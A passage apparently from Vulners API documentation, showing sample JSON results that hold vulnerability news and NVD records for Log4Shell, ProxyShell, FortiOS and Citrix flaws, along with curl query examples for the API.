(QID):  50114, 50111, 50112**\n\n**In the &quot;Top 12 Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier. **\n\nProxyShell, a chain of vulnerabilities that impacts on-premises Microsoft Exchange Servers, is widely used for email and associated services globally.\n\nThese vulnerabilities exist in the Microsoft Client Access Service (CAS), typically running on port 443 in IIS, often exposed to the internet to allow users to access their email remotely. This exposure has led to widespread exploitation by threat actors deploying web shells to execute arbitrary code on compromised devices. They allow an actor to bypass authentication and execute code as a privileged user.\n\n### 9\\. **CVE-2019-11510: Pulse Secure Pulse Connect Secure SSL VPN Unauthenticated Path**\n\n**Vulnerability Trending Over Years: 2019, 2020, 2023 (53 times)**\n\nIt was exploited by 13 Malware, 18 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID):  38771**\n\n**In the &quot;Additional Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier.**\n\nCVE-2019-11510 is a critical vulnerability found in Pulse Connect Secure, a widely used VPN solution by Pulse Secure. The flaw enables an unauthenticated, remote attacker to exploit a specific endpoint and read arbitrary files on the system, including sensitive information such as private keys and user credentials.\n\nDue to its severity, It can provide an attacker with similar access to the corporate network as a legitimate user.\n\n### 10\\. **CVE-2021-44228: Apache Log4j Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (77 times)**\n\nIt was exploited by 10 Malware, 26 Threat Actors, and 5 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID):  376157, 730297**\n\n**In the &quot;Top 12 Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier.**\n\nCVE-2021-44228, or &quot;Log4Shell,&quot; is a severe vulnerability in Apache&#x27;s log4j Java library. The flaw exploits the &#x27;lookups&#x27; feature of log4j, enabling an attacker to use a specially crafted input to trigger the execution of a remote Java class on an LDAP server, leading to Remote Code Execution.\n\nThis issue is highly dangerous if the user input containing specific characters is logged by log4j. It can trigger Java method lookup, resulting in the execution of a user-defined remote Java class on an LDAP server, leading to Remote Code Execution (RCE) on the server running the vulnerable log4j instance.\n\n### 11\\. **CVE-2014-6271: Shellshock \u2013 Linux Bash Vulnerability**\n\n**Vulnerability Trending Over Years: 2014, 2016, 2017, 2020, 2021, 2022, 2023 (70 times)**\n\nIt was exploited by 18 Malware, 1 Threat Actors, and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID):  122693, 13038, 150134**\n\nShellshock (CVE-2014-6271) is a critical vulnerability affecting the Unix Bash shell in many Linux, Unix, and Mac OS systems. It allows remote code execution by misusing Bash&#x27;s processing of environment variables, enabling attackers to append and execute malicious commands. It has a high severity score since it can impact multiple devices and applications, risking unauthorized data access or service disruption,\n\n### 12\\. **CVE-2018-8174: Windows VBScript Engine Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2023 (30 times)**\n\nIt was exploited by 21 Malware, 10 Threat Actors, and 7 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID):  91447**\n\nCVE-2018-8174 is a critical vulnerability in Microsoft Windows&#x27; VBScript Engine, enabling remote code execution. Triggered by viewing a malicious website with Internet Explorer or opening a rigged Microsoft Office document, this flaw allows an attacker to manipulate memory objects and execute code.  \nThe attacker can fully control the system if the user has administrative rights.**  \n**\n\n### 13\\. **CVE-2013-0074: Microsoft Silverlight Could Allow Remote Code Execution**\n\n**Vulnerability Trending Over Years**_**: **_**2023 (8 times)**\n\nIt was exploited by 62 Malware 50 Ransomware and was trending in the wild as recently as August 20, 2023.\n\n**Qualys Vulnerability Detection (QID):  90870**\n\nCVE-2013-0074 is a remote code execution vulnerability in Microsoft Silverlight, which permits a crafted Silverlight application to access memory unsafely, thereby leading to the execution of arbitrary code under the current user\u2019s security context.\n\nIf the user has admin rights, the attacker installs programs, alters or deletes data, or generates new accounts with full privileges. The user can be deceived into visiting a malicious website or clicking on a link, commonly through an email or instant message.\n\n### 14\\. **CVE-2012-0507: Oracle Java SE Remote Java Runtime Environment Vulnerability**\n\n**Vulnerability Trending Over Years: 2023 (10 times)**\n\nIt was exploited by 66 Malware, 3 Threat Actors, and 42 Ransomware and was trending in the wild as recently as July 26, 2023.\n\n**Qualys Vulnerability Detection (QID):  119956**\n\nCVE-2012-0507 is a critical vulnerability in the Java Runtime Environment (JRE) allowing untrusted Java applets to execute arbitrary code outside the Java sandbox. Originating from a flaw in the AtomicReferenceArray class implementation, **this vulnerability was exploited by Flashback Trojan in 2012**. It was observed to have led to one of the most significant known malware attacks on Apple devices. Attackers can exploit this vulnerability by tricking users into visiting a malicious website hosting a Java applet.\n\n### 15\\. **CVE-2019-19781: Citrix ADC and Citrix Gateway - Remote Code Execution (RCE) Vulnerability**\n\n**Vulnerability Trending Over Years: 2020, 2022, 2023 (60 times)**\n\nIt was exploited by 11 Malware, 12 Threat Actors, and 10 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID):  372305, 150273**\n\n**In the &quot;Additional Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier.**\n\nCVE-2019-19781, or &quot;Shitrix,&quot; is a significant vulnerability associated with Citrix Application Delivery Controller (ADC) and Citrix Gateway, allowing unauthenticated attackers to perform arbitrary code execution, granting them access to internal network resources.\n\nThe flaw resides in the VPN component of the affected products, enabling directory traversal and giving attackers both read and write access to the underlying file system.\n\n### 16\\. **CVE-2018-0802: Microsoft Office Memory Corruption Vulnerability**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (19 times)**\n\nExploited by 29 Malware 24 Threat Actors, and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID):  110310**\n\nCVE-2018-0802 is a critical vulnerability within Microsoft Office and WordPad, which, if exploited, allows remote code execution via specially crafted files.\n\nAttackers can run arbitrary code in the current user&#x27;s context, potentially taking over the system if the user holds administrative rights. This vulnerability was notably used in targeted attacks and was being actively exploited before Microsoft released a security update in January 2018 that correctly handles objects in memory, resolving the issue.\n\n### 17\\. **CVE-2021-26855: Microsoft Exchange Server Authentication Bypass (RCE)**\n\n**Vulnerability Trending Over Years:** **2021, 2023 (46 times)**\n\nIt was exploited by 19 Malware, 22 Threat Actors, and 9 Ransomware and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID):  50107, 50108**\n\n**In the &quot;Additional Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier.**\n\nCVE-2021-26855, a part of the ProxyLogon exploit chain, is a server-side request forgery (SSRF) vulnerability in Microsoft Exchange Server that enables attackers to bypass authentication mechanisms and impersonate users.\n\nThe flaw allows arbitrary HTTP requests, granting access to users&#x27; mailboxes and enabling information theft. It has been widely exploited by various threat actors, leading to emergency patches by Microsoft.\n\n### 18\\. **CVE-2019-2725: Oracle WebLogic Affected by Unauthenticated RCE Vulnerability**\n\n**Vulnerability Trending Over Years: 2019, 2020, 2022, 2023 (53 times)** \n\nIt was exploited by 10 Malware, 4 Threat Actors, 9 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID):  150267, 87386** \n\nCVE-2019-2725 is a severe remote code execution vulnerability in Oracle WebLogic Server that allows unauthenticated attackers to execute arbitrary code over a network without user interaction. It was quickly weaponized to install cryptocurrency miners. \n\n### 19\\. **CVE-2018-13379: Fortinet FortiGate (FortiOS) System File Leak through Secure Sockets Layer (SSL)**\n\n**Vulnerability Trending Over Years: 2020, 2021, 2023 (41 times)** \n\nIt was exploited by 6 Malware, 13 Threat Actors, 6 Ransomware and was trending in the wild as recently as August 30, 2023.\n\n**Qualys Vulnerability Detection (QID):  43702** \n\n**In the &quot;Top 12 Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier. **\n\nCVE-2018-13379 is a path traversal vulnerability found in the Fortinet FortiOS SSL VPN web portal. An unauthenticated attacker can read sensitive system files via specially crafted HTTP requests. The exploit could expose SSL VPN session data, leading to more severe attacks. \n\n### 20\\. CVE-2021-26084: Atlassian Confluence Server Webwork OGNL Injection RCE Vulnerability\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (35 times)**\n\nIt was exploited by 8 Malware, 6 Threat Actors, and 8 Ransomware and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID):  730172, 150368, 375839**\n\n**In the &quot;Top 12 Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier.**\n\nCVE-2021-26084 is a critical vulnerability in Atlassian&#x27;s Confluence Server and Data Center, specifically within the Webwork OGNL component. This vulnerability can enable an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance, potentially compromising system integrity.\n\n## TruRisk Dashboard\n\nThe Qualys VMDR helps organizations get instant visibility into high-risk and top twenty vulnerabilities.\n\n[![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/09/Blog-3-1070x588.jpg)](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/09/Blog-3.jpg>)Fig 3. Qualys VMDR TruRisk Dashboard for Top 20 Vulnerabilities\n\nThe **Qualys VMDR TruRisk Dashboard** helps organizations to have complete visibility into open vulnerabilities that focus on the organization\u2019s global risk score and high-risk vulnerabilities with your organization\u2019s global risk score and high-risk vulnerabilities. Once you identify the vulnerable assets for these top twenty CVEs prioritized among your remediation owners, you can use Qualys Patch management to instantly reduce the risk.\n\nThe TruRisk VMDR Dashboard is available \u2013 [Download the Dashboard Here](<https://blog.qualys.com/wp-content/uploads/2023/09/Qualys_VMDR_TruRisk__Dashboard.zip>)\n\n## Key Insights &amp; Takeaways\n\n  * In the current Vulnerability Threat Landscape, identifying open vulnerabilities and effective remediation is the highest priority for every defender.\n  * Among the vast scale of the CVEs available, you need to know the weaponized high-risk vulnerabilities that are actively targeted by Threat Actors, Malware, and ransomware families.\n  * Use multi-dimensional Threat Intelligence to prioritize vulnerabilities rather than implementing multiple siloed threat approaches.\n  * The Qualys VMDR with TruRisk automatically prioritizes vulnerabilities exploited in the wild with a TruRisk score of 90 or higher, greatly simplifying the prioritization process.\n\n## References\n\n  * [Part 1: An In-Depth Look at the Latest Vulnerability Threat Landscape](<https://blog.qualys.com/product-tech/2023/07/11/an-in-depth-look-at-the-latest-vulnerability-threat-landscape-part-1>)\n  * [Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers\u2019 Edition)](<https://blog.qualys.com/vulnerabilities-threat-research/2023/07/18/part-2-an-in-depth-look-at-the-latest-vulnerability-threat-landscape-attackers-edition>)\n\n## Additional Contributors\n\n  * **Shreya Salvi, Data Scientist, Qualys**\n  * **Saeed Abbasi, Product Manager, Vulnerability Research**",
        "published": "2023-09-04T14:00:00",
        "type": "qualysblog",
        "title": "Qualys Top 20 Most Exploited Vulnerabilities"
    },
    {
        "cvelist": [
            "CVE-2023-20890",
            "CVE-2023-20900",
            "CVE-2023-34039"
        ],
        "description": "[![SSH Auth Bypass Vulnerability](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjE4D8MhqYWhfOd2aFpaVvixDOV5nqQyXiMBd139w2Jpvafo4jbxBZb67rbGUsBQGPRZXiZ-SHUBx7swBloTSp-zcUZOaJJHmtml2DKIPhpb0BbyUObsy_u1BBNtROerY_zG41faeFdJnc81KF2uLkLuSFBHt7h_32nWsKDAEpauo0kNvWDGetxuzCRHV4D/s728-e365/exploit.jpg>)\n\nProof-of-concept (PoC) exploit code has been made available for a recently disclosed and patched critical flaw impacting VMware Aria Operations for Networks (formerly vRealize Network Insight).\n\nThe flaw, tracked as [CVE-2023-34039](<https://thehackernews.com/2023/08/critical-vulnerability-alert-vmware.html>), is rated 9.8 out of a maximum of 10 for severity and has been described as a case of authentication bypass due to a lack of unique cryptographic key generation.\n\n\"A malicious actor with network access to Aria Operations for Networks could bypass SSH authentication to gain access to the Aria Operations for Networks CLI,\" VMware said earlier this week.\n\nSummoning Team's Sina Kheirkhah, who published the PoC following an analysis of the patch released by VMware, said the root cause can be traced back to a bash script containing a method named refresh_ssh_keys(), which is responsible for overwriting the current SSH keys for the support and ubuntu users in the authorized_keys file.\n\n\"There is SSH authentication in place; however, VMware forgot to regenerate the keys,\" Kheirkhah [said](<https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/>). \"VMware's Aria Operations for Networks had hard-coded its keys from version 6.0 to 6.10.\"\n\n[![Cybersecurity](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thn.news/o6a5Vxgy> \"Cybersecurity\" )\n\nVMware's latest fixes also address CVE-2023-20890, an arbitrary file write vulnerability impacting Aria Operations for Networks that could be abused by an adversary with administrative access to write files to arbitrary locations and achieve remote code execution.\n\nIn other words, a threat actor could leverage the PoC to obtain admin access to the device and exploit CVE-2023-20890 to run arbitrary payloads, making it crucial that users apply the updates to secure against potential threats.\n\nThe release of the PoC coincides with the virtualization technology giant issuing fixes for a high-severity SAML token signature bypass flaw (CVE-2023-20900, CVSS score: 7.5) across several Windows and Linux versions of VMware Tools.\n\n\"A malicious actor with man-in-the-middle (MITM) network positioning in the virtual machine network may be able to bypass SAML token signature verification, to perform VMware Tools Guest Operations,\" the company [said](<https://www.vmware.com/security/advisories/VMSA-2023-0019.html>) in an advisory released Thursday.\n\nPeter St\u00f6ckli of GitHub Security Lab has been credited with reporting the flaw, which affects the following versions -\n\n  * VMware Tools for Windows (12.x.x, 11.x.x, 10.3.x) - Fixed in 12.3.0\n  * VMware Tools for Linux (10.3.x) - Fixed in 10.3.26\n  * Open-source implementation of VMware Tools for Linux or open-vm-tools (12.x.x, 11.x.x, 10.3.x) - Fixed in 12.3.0 (to be distributed by Linux vendors)\n\nThe development also comes as Fortinet FortiGuard Labs [warned](<https://www.fortinet.com/blog/threat-research/multiple-threats-target-adobe-coldfusion-vulnerabilities>) of continued exploitation of [Adobe ColdFusion Vulnerabilities](<https://thehackernews.com/2023/07/adobe-rolls-out-new-patches-for.html>) by threat actors to deploy cryptocurrency miners and [hybrid bots](<https://research.checkpoint.com/2020/rudeminer-blacksquid-and-lucifer-walk-into-a-bar/>) such as Satan DDoS (aka Lucifer) and RudeMiner (aka SpreadMiner) that are capable of carrying out cryptojacking and distributed denial-of-service (DDoS) attacks.\n\nAlso deployed is a backdoor named [BillGates](<https://www.trendmicro.com/en_us/research/19/g/multistage-attack-delivers-billgates-setag-backdoor-can-turn-elasticsearch-databases-into-ddos-botnet-zombies.html>) (aka [Setag](<https://www.fortinet.com/blog/threat-research/recent-attack-uses-vulnerability-on-confluence-server>)), which is known for hijacking systems, stealing sensitive information, and initiating DDoS attacks.\n\n  \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n",
        "published": "2023-09-03T04:42:00",
        "type": "thn",
        "title": "PoC Exploit Released for Critical VMware Aria's SSH Auth Bypass Vulnerability"
    }
]

Full data by id

Full information on a bulletin using a specific identifier.

Required parameters:

  • id (str): bulletin id
  • apiKey: Activated API key

Query:

POST /api/v3/search/id/

Query example:

curl -XPOST https://vulners.com/api/v3/search/id -H  'Content-Type: application/json' -d '{
"id": "CVE-2024-21762", 
fields": ["*"],
"apiKey": "{API key}"
}'

CVE_2017_14174 = vulners_api.get_bulletin("CVE-2024-21762", fields=["*"])
{
    "id": "CVE-2024-21762",
    "vendorId": null,
    "type": "cve",
    "bulletinFamily": "NVD",
    "title": "CVE-2024-21762",
    "description": "A out-of-bounds write in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7 allows attacker to execute unauthorized code or commands via specifically crafted requests",
    "published": "2024-02-09T09:15:08",
    "modified": "2024-02-10T02:00:01",
    "epss": [
        {
            "cve": "CVE-2024-21762",
            "epss": 0.01179,
            "percentile": 0.84607,
            "modified": "2024-02-12"
        }
    ],
    "cvss": {
        "score": 7.5,
        "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"
    },
    "cvss2": {
        "cvssV2": {
            "version": "2.0",
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "accessVector": "NETWORK",
            "accessComplexity": "LOW",
            "authentication": "NONE",
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "PARTIAL",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5
        },
        "severity": "HIGH",
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "acInsufInfo": false,
        "obtainAllPrivilege": false,
        "obtainUserPrivilege": false,
        "obtainOtherPrivilege": false,
        "userInteractionRequired": false
    },
    "cvss3": {
        "cvssV3": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL"
        }
    },
    "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-21762",
    "reporter": "[email protected]",
    "references": [
        "https://fortiguard.com/psirt/FG-IR-24-015"
    ],
    "cvelist": [
        "CVE-2024-21762"
    ],
    "immutableFields": [],
    "lastseen": "2024-02-12T15:22:04",
    "viewCount": 47,
    "enchantments": {
        "short_description": "CVE-2024-21762: Out-of-bounds write in Fortinet FortiOS versions, allowing unauthorized code executio",
        "tags": [
            "cve-2024-21762",
            "fortinet",
            "fortios",
            "out-of-bounds write",
            "unauthorized code execution",
            "security vulnerability",
            "nvd"
        ],
        "dependencies": {
            "references": [
                {
                    "type": "cisa_kev",
                    "idList": [
                        "CISA-KEV-CVE-2024-21762"
                    ]
                },
                {
                    "type": "hivepro",
                    "idList": [
                        "HIVEPRO:4FDFE6EE844A7B3ED3D4E07DA047CFCA"
                    ]
                },
                {
                    "type": "nessus",
                    "idList": [
                        "FORTIGATE_FG-IR-24-015.NASL"
                    ]
                },
                {
                    "type": "prion",
                    "idList": [
                        "PRION:CVE-2024-21762"
                    ]
                },
                {
                    "type": "rapid7blog",
                    "idList": [
                        "RAPID7BLOG:0E907B2DDA83198AFC222340903BE902"
                    ]
                },
                {
                    "type": "thn",
                    "idList": [
                        "THN:F60A4974F1101ED1147C3C221F8FF1EF"
                    ]
                },
                {
                    "type": "wizblog",
                    "idList": [
                        "WIZBLOG:73EB08B6610483BFE7972345C53E5AD8"
                    ]
                }
            ]
        },
        "score": {
            "value": 7.9,
            "uncertanity": 1.7,
            "vector": "NONE"
        },
        "exploitation": {
            "wildExploitedSources": [
                {
                    "type": "cisa_kev",
                    "idList": [
                        "CISA-KEV-CVE-2024-21762"
                    ]
                }
            ],
            "wildExploited": true
        },
        "reddit": {
            "counter": 90,
            "posts": [
                {
                    "link": "https://www.reddit.com/r/fortinet/comments/1aodfgl/iocs_for_cve202421762/",
                    "text": "IOCsforCVE-2024-21762",
                    "author": "tacticalAlmonds",
                    "author_photo": "https://www.redditstatic.com/avatars/defaults/v2/avatar_default_3.png",
                    "date": "2024-02-11T20:32:44+00:00"
                }
            ]
        },
        "vulnersScore": 7.9
    },
    "cna_cvss": {
        "cna": "fortinet",
        "cvss": {
            "3": {
                "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:W/RC:C",
                "score": 9.6
            }
        }
    },
    "cpe": [],
    "cpe23": [],
    "cwe": [
        "CWE-787"
    ],
    "affectedSoftware": [],
    "affectedConfiguration": [],
    "cpeConfiguration": {},
    "extraReferences": [
        {
            "url": "https://fortiguard.com/psirt/FG-IR-24-015",
            "source": "[email protected]"
        }
    ],
    "product_info": [
        {
            "vendor": "Fortinet",
            "product": "FortiOS"
        },
        {
            "vendor": "Fortinet",
            "product": "FortiProxy"
        }
    ],
    "solutions": [
        {
            "lang": "en",
            "value": "Please upgrade to FortiProxy version 7.4.3 or above \nPlease upgrade to FortiProxy version 7.2.9 or above \nPlease upgrade to FortiProxy version 7.0.15 or above \nPlease upgrade to FortiProxy version 2.0.14 or above \nPlease upgrade to FortiOS version 7.6.0 or above \nPlease upgrade to FortiOS version 7.4.3 or above \nPlease upgrade to FortiOS version 7.2.7 or above \nPlease upgrade to FortiOS version 7.0.14 or above \nPlease upgrade to FortiOS version 6.4.15 or above \nPlease upgrade to FortiOS version 6.2.16 or above \n"
        }
    ],
    "workarounds": [],
    "impacts": [],
    "problemTypes": [
        {
            "descriptions": [
                {
                    "lang": "en",
                    "cweId": "CWE-787",
                    "description": "Execute unauthorized code or commands",
                    "type": "CWE"
                }
            ]
        }
    ],
    "exploits": [],
    "assigned": "2024-01-02T10:15:00"
}

Full data by id list

To obtain full information on a list of bulletins, please specify the identifiers of the required documents.

Required parameters:

  • id (list): bulletin ids
  • apiKey: Activated API key

Query:

POST /api/v3/search/id/

Query example:

curl -XPOST https://vulners.com/api/v3/search/id -H  'Content-Type: application/json' -d '{
"id": [
    "CVE-2023-6548", 
    "CVE-2023-6549"], 
"fields": ["*"], 
"apiKey": "{API key}"
}'

{
    "CVE-2023-6548": {
        "id": "CVE-2023-6548",
        "vendorId": null,
        "type": "cve",
        "bulletinFamily": "NVD",
        "title": "CVE-2023-6548",
        "description": "Improper Control of Generation of Code ('Code Injection') in NetScaler ADC and NetScaler Gateway\u00a0allows an attacker with\u00a0access\u00a0to NSIP, CLIP or SNIP with management interface to perform\u00a0Authenticated (low privileged) remote code execution on Management Interface.",
        "published": "2024-01-17T20:15:50",
        "modified": "2024-01-25T16:45:58",
        "epss": [
            {
                "cve": "CVE-2023-6548",
                "epss": 0.01075,
                "percentile": 0.838,
                "modified": "2024-02-11"
            }
        ],
        "cvss": {
            "score": 6.5,
            "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"
        },
        "cvss2": {
            "cvssV2": {
                "version": "2.0",
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "accessVector": "NETWORK",
                "accessComplexity": "LOW",
                "authentication": "SINGLE",
                "confidentialityImpact": "PARTIAL",
                "integrityImpact": "PARTIAL",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5
            },
            "severity": "MEDIUM",
            "exploitabilityScore": 8.0,
            "impactScore": 6.4,
            "acInsufInfo": false,
            "obtainAllPrivilege": false,
            "obtainUserPrivilege": false,
            "obtainOtherPrivilege": false,
            "userInteractionRequired": false
        },
        "cvss3": {
            "cvssV3": {
                "version": "3.1",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "attackVector": "NETWORK",
                "attackComplexity": "LOW",
                "privilegesRequired": "LOW",
                "userInteraction": "NONE",
                "scope": "UNCHANGED",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "HIGH",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH"
            }
        },
        "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-6548",
        "reporter": "[email protected]",
        "references": [
            "https://support.citrix.com/article/CTX584986/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20236548-and-cve20236549"
        ],
        "cvelist": [
            "CVE-2023-6548"
        ],
        "immutableFields": [],
        "lastseen": "2024-02-12T11:56:59",
        "viewCount": 69,
        "enchantments": {
            "score": {
                "value": 6.5,
                "uncertanity": 0.2,
                "vector": "NONE"
            },
            "dependencies": {
                "references": [
                    {
                        "type": "attackerkb",
                        "idList": [
                            "AKB:BA3D9466-011E-4807-82FD-0DC03734CDDD"
                        ]
                    },
                    {
                        "type": "cisa_kev",
                        "idList": [
                            "CISA-KEV-CVE-2023-6548"
                        ]
                    },
                    {
                        "type": "citrix",
                        "idList": [
                            "CTX584986"
                        ]
                    },
                    {
                        "type": "hivepro",
                        "idList": [
                            "HIVEPRO:E7C0D983EAA9A4C2CE2DCCCCA4B407DD"
                        ]
                    },
                    {
                        "type": "malwarebytes",
                        "idList": [
                            "MALWAREBYTES:6CCC816574632169A05704CE0E1928C8"
                        ]
                    },
                    {
                        "type": "nessus",
                        "idList": [
                            "NETSCALER_ADC_GATEWAY_CTX584986.NASL"
                        ]
                    },
                    {
                        "type": "prion",
                        "idList": [
                            "PRION:CVE-2023-6548"
                        ]
                    },
                    {
                        "type": "thn",
                        "idList": [
                            "THN:55036E69D47D64800FB4CB6F8068DA4F"
                        ]
                    }
                ]
            },
            "reddit": {
                "counter": 24,
                "posts": [
                    {
                        "link": "https://www.reddit.com/r/CTI/comments/19a0a8c/cisa_adds_chrome_and_citrix_netscaler_to_its/",
                        "text": "CISAaddsChromeandCitrixNetScalertoitsKnownExploitedVulnerabilitiescatalog",
                        "author": "SirEliasRiddle",
                        "author_photo": "https://i.redd.it/snoovatar/avatars/nftv2_bmZ0X2VpcDE1NToxMzdfNDY2YTMzMDg4N2JkZjYyZDUzZjk2OGVhODI0NzkzMTUwZjA3NzYyZV8xMTkzMjQ5_rare_892c4323-6b60-487d-9278-5c0b90c591d4-headshot.png",
                        "date": "2024-01-18T23:43:43+00:00"
                    }
                ]
            },
            "exploitation": {
                "wildExploitedSources": [
                    {
                        "type": "attackerkb",
                        "idList": [
                            "AKB:BA3D9466-011E-4807-82FD-0DC03734CDDD"
                        ]
                    },
                    {
                        "type": "cisa_kev",
                        "idList": [
                            "CISA-KEV-CVE-2023-6548"
                        ]
                    }
                ],
                "wildExploited": true
            },
            "short_description": "CVE-2023-6548: Security vulnerability in a component of Vendor Product Version on multiple platforms allows attackers to impact via a specific vector",
            "tags": [
                "cve-2023-6548",
                "security vulnerability",
                "component",
                "vendor",
                "product",
                "version",
                "attack",
                "impact",
                "vector",
                "nvd"
            ],
            "vulnersScore": 6.5
        },
        "cna_cvss": {
            "cna": "Citrix",
            "cvss": {
                "3": {
                    "vector": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
                    "score": 5.5
                }
            }
        },
        "cpe": [],
        "cpe23": [],
        "cwe": [
            "CWE-94",
            "CWE-94"
        ],
        "affectedSoftware": [
            {
                "cpeName": "citrix:netscaler_application_delivery_controller",
                "version": "12.1-55.302",
                "operator": "lt",
                "name": "citrix netscaler application delivery controller"
            },
            {
                "cpeName": "citrix:netscaler_application_delivery_controller",
                "version": "13.0-92.21",
                "operator": "lt",
                "name": "citrix netscaler application delivery controller"
            },
            {
                "cpeName": "citrix:netscaler_application_delivery_controller",
                "version": "13.1-37.176",
                "operator": "lt",
                "name": "citrix netscaler application delivery controller"
            },
            {
                "cpeName": "citrix:netscaler_application_delivery_controller",
                "version": "13.1-51.15",
                "operator": "lt",
                "name": "citrix netscaler application delivery controller"
            },
            {
                "cpeName": "citrix:netscaler_application_delivery_controller",
                "version": "14.1-12.35",
                "operator": "lt",
                "name": "citrix netscaler application delivery controller"
            },
            {
                "cpeName": "citrix:netscaler_gateway",
                "version": "13.0-92.21",
                "operator": "lt",
                "name": "citrix netscaler gateway"
            },
            {
                "cpeName": "citrix:netscaler_gateway",
                "version": "13.1-51.15",
                "operator": "lt",
                "name": "citrix netscaler gateway"
            },
            {
                "cpeName": "citrix:netscaler_gateway",
                "version": "14.1-12.35",
                "operator": "lt",
                "name": "citrix netscaler gateway"
            }
        ],
        "affectedConfiguration": [],
        "cpeConfiguration": {
            "nodes": [
                {
                    "operator": "OR",
                    "negate": false,
                    "cpeMatch": [
                        {
                            "vulnerable": true,
                            "criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:12.1-55.302:*:*:*:fips:*:*:*",
                            "versionStartIncluding": "12.1",
                            "versionEndExcluding": "12.1-55.302",
                            "matchCriteriaId": "E5672003-8E6B-4316-B5C9-FE436080ADD1"
                        },
                        {
                            "vulnerable": true,
                            "criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:12.1-55.302:*:*:*:ndcpp:*:*:*",
                            "versionStartIncluding": "12.1",
                            "versionEndExcluding": "12.1-55.302",
                            "matchCriteriaId": "D1A11ABD-4F45-4BA9-B30B-F1D8A612CC15"
                        },
                        {
                            "vulnerable": true,
                            "criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:13.0-92.21:*:*:*:-:*:*:*",
                            "versionStartIncluding": "13.0",
                            "versionEndExcluding": "13.0-92.21",
                            "matchCriteriaId": "FC0A5AAC-62DD-416A-A801-A7A95D5EF73C"
                        },
                        {
                            "vulnerable": true,
                            "criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:13.1-37.176:*:*:*:fips:*:*:*",
                            "versionStartIncluding": "13.1",
                            "versionEndExcluding": "13.1-37.176",
                            "matchCriteriaId": "8C8A6B95-8338-4EE7-A6EC-7D84AEDC4AF3"
                        },
                        {
                            "vulnerable": true,
                            "criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:13.1-51.15:*:*:*:-:*:*:*",
                            "versionStartIncluding": "13.1",
                            "versionEndExcluding": "13.1-51.15",
